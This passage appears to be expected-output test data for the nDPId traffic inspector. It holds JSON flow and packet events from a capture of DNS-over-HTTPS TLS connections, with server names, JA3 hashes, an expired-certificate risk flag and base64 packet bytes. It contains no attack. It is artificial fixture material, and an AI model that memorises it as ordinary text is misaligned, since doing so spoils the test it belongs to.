-01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="} -00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaNNWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmnMdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jdG+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zNuwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 